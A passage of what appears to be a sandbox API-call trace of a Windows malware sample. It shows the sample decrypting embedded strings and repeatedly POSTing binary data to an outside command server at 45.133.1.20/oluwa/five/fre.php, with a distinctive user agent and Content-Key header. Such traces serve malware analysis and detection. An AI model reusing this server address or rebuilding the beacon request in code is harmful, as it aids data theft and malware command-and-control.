pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0214.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.178] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0214.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.179] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0214.179] GetProcessHeap () returned 0x6a0000 [0214.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.180] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.183] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.184] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.185] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.185] GetProcessHeap () returned 0x6a0000 [0214.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0214.185] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.185] GetProcessHeap () returned 0x6a0000 [0214.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0214.186] GetProcessHeap () returned 0x6a0000 [0214.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.186] GetProcessHeap () returned 0x6a0000 [0214.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0214.187] GetProcessHeap () returned 0x6a0000 [0214.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0214.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.188] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0214.201] GetProcessHeap () returned 0x6a0000 [0214.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0214.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.202] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0214.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.203] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.204] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.204] GetProcessHeap () returned 0x6a0000 [0214.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0214.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.206] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0214.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.207] CryptDestroyKey (hKey=0x6ad520) returned 1 [0214.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.208] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0214.208] GetProcessHeap () returned 0x6a0000 [0214.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.209] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0214.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.210] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0214.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.212] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0214.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.213] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0214.213] GetProcessHeap () returned 0x6a0000 [0214.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0214.213] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0214.213] GetProcessHeap () returned 0x6a0000 [0214.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0214.213] socket (af=2, type=1, protocol=6) returned 0x600 [0214.213] connect (s=0x600, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0214.238] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0214.239] GetProcessHeap () returned 0x6a0000 [0214.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0214.239] GetProcessHeap () returned 0x6a0000 [0214.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0214.240] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.241] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.241] GetProcessHeap () returned 0x6a0000 [0214.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0214.241] GetProcessHeap () returned 0x6a0000 [0214.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.242] GetProcessHeap () returned 0x6a0000 [0214.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0214.242] GetProcessHeap () returned 0x6a0000 [0214.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0214.243] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.243] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.243] GetProcessHeap () returned 0x6a0000 [0214.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0214.243] GetProcessHeap () returned 0x6a0000 [0214.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.244] send (s=0x600, buf=0x6b5c98*, len=242, flags=0) returned 242 [0214.244] send (s=0x600, buf=0x6bb998*, len=159, flags=0) returned 159 [0214.245] GetProcessHeap () returned 0x6a0000 [0214.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0214.245] recv (in: s=0x600, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0214.331] GetProcessHeap () returned 0x6a0000 [0214.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0214.332] GetProcessHeap () returned 0x6a0000 [0214.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0214.333] GetProcessHeap () returned 0x6a0000 [0214.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0214.333] GetProcessHeap () returned 0x6a0000 [0214.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0214.333] closesocket (s=0x600) returned 0 [0214.334] GetProcessHeap () returned 0x6a0000 [0214.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0214.334] GetProcessHeap () returned 0x6a0000 [0214.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.334] GetProcessHeap () returned 0x6a0000 [0214.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0214.335] GetProcessHeap () returned 0x6a0000 [0214.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0214.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc28) returned 0x600 [0214.337] Sleep (dwMilliseconds=0xea60) [0214.338] GetProcessHeap () returned 0x6a0000 [0214.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0214.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.340] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0214.354] GetProcessHeap () returned 0x6a0000 [0214.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c6220 [0214.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.355] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c6220, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0214.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.356] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.356] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.357] GetProcessHeap () returned 0x6a0000 [0214.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6220 | out: hHeap=0x6a0000) returned 1 [0214.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.358] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0214.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.359] CryptDestroyKey (hKey=0x6ad520) returned 1 [0214.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.360] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0214.360] GetProcessHeap () returned 0x6a0000 [0214.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.367] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.378] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.379] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.379] GetProcessHeap () returned 0x6a0000 [0214.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0214.379] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.379] GetProcessHeap () returned 0x6a0000 [0214.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0214.380] GetProcessHeap () returned 0x6a0000 [0214.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.380] GetProcessHeap () returned 0x6a0000 [0214.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0214.381] GetProcessHeap () returned 0x6a0000 [0214.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0214.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0214.399] GetProcessHeap () returned 0x6a0000 [0214.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0214.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.401] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0214.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.402] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.404] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.404] GetProcessHeap () returned 0x6a0000 [0214.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0214.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.408] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0214.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.409] CryptDestroyKey (hKey=0x6ad020) returned 1 [0214.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.410] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0214.410] GetProcessHeap () returned 0x6a0000 [0214.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.412] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0214.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.413] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0214.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.414] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0214.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.418] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0214.418] GetProcessHeap () returned 0x6a0000 [0214.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0214.419] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0214.419] GetProcessHeap () returned 0x6a0000 [0214.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0214.419] socket (af=2, type=1, protocol=6) returned 0x604 [0214.419] connect (s=0x604, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0214.442] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0214.442] GetProcessHeap () returned 0x6a0000 [0214.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0214.442] GetProcessHeap () returned 0x6a0000 [0214.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0214.443] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.444] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.444] GetProcessHeap () returned 0x6a0000 [0214.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0214.444] GetProcessHeap () returned 0x6a0000 [0214.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.445] GetProcessHeap () returned 0x6a0000 [0214.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0214.445] GetProcessHeap () returned 0x6a0000 [0214.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0214.446] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.447] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.447] GetProcessHeap () returned 0x6a0000 [0214.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0214.447] GetProcessHeap () returned 0x6a0000 [0214.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.448] send (s=0x604, buf=0x6b5c98*, len=242, flags=0) returned 242 [0214.448] send (s=0x604, buf=0x6bb998*, len=159, flags=0) returned 159 [0214.448] GetProcessHeap () returned 0x6a0000 [0214.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0214.448] recv (in: s=0x604, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0214.578] GetProcessHeap () returned 0x6a0000 [0214.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0214.580] GetProcessHeap () returned 0x6a0000 [0214.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0214.581] GetProcessHeap () returned 0x6a0000 [0214.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0214.581] GetProcessHeap () returned 0x6a0000 [0214.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0214.582] closesocket (s=0x604) returned 0 [0214.583] GetProcessHeap () returned 0x6a0000 [0214.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0214.583] GetProcessHeap () returned 0x6a0000 [0214.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.583] GetProcessHeap () returned 0x6a0000 [0214.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0214.583] GetProcessHeap () returned 0x6a0000 [0214.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0214.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x958) returned 0x604 [0214.585] Sleep (dwMilliseconds=0xea60) [0214.587] GetProcessHeap () returned 0x6a0000 [0214.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0214.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0214.606] GetProcessHeap () returned 0x6a0000 [0214.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c64c0 [0214.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.607] CryptImportKey (in: hProv=0x6bf058, pbData=0x6c64c0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0214.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.608] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.609] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.609] GetProcessHeap () returned 0x6a0000 [0214.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c64c0 | out: hHeap=0x6a0000) returned 1 [0214.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.611] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0214.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.611] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0214.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.612] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0214.613] GetProcessHeap () returned 0x6a0000 [0214.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.613] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.614] StrStrA 